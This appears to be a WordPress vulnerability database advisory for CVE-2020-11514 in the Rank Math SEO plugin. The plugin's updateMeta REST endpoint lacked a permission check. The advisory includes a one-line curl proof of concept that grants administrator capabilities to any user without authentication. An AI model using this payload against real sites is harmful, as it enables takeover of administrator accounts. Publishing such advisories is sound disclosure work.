WordPress SEO Plugin – Rank Math < 1.0.41 – Privilege Escalation via Unprotected REST API Endpoint | CVE 2020-11514 | Plugin Vulnerabilities

Description

This plugin registered a REST-API endpoint, rankmath/v1/updateMeta, which failed to include a permission_callback used for capability checking. The endpoint called a function, update_metadata which could be used to update the slug on existing posts, or could be used to delete or update metadata for posts, comments, and terms. This endpoint also allowed for updating metadata for users. WordPress user permissions are stored in the usermeta table, which meant that an unauthenticated attacker could grant or revoke administrative privileges for any registered user.

Proof of Concept

curl -X POST --data "objectID=<user ID to edit>&objectType=user&meta[wp_user_level]=10&meta[wp_capabilities][administrator]=1" http://example.site/wp-json/rankmath/v1/updateMeta

Affects Plugins

seo-by-rank-math

Fixed in 1.0.41

References

CVE

URL

https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Ramuel Gall (Wordfence)

Submitter

Ramuel Gall

Verified

No

WPVDB ID

d2ddd248-52a0-4c91-92e8-beb60d8f78cd

Timeline

Publicly Published

2020-03-31 (about 4 years ago)

Added

2020-03-31 (about 4 years ago)

Last Updated

2020-09-22 (about 3 years ago)

Other

Published

Title

Published

2023-08-08

Title

Biometric Login for WooCommerce < 1.0.4 - Unauthenticated Privilege Escalation

Published

2016-02-18

Title

ElegantThemes - Privilege Escalation

Published

2019-08-03

Title

ND Donations < 1.4 - Unauthenticated Options Change

Published

2017-11-12

Title

WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution

Published

2019-12-13

Title

WordPress <= 5.3 - Authenticated Improper Access Controls in REST API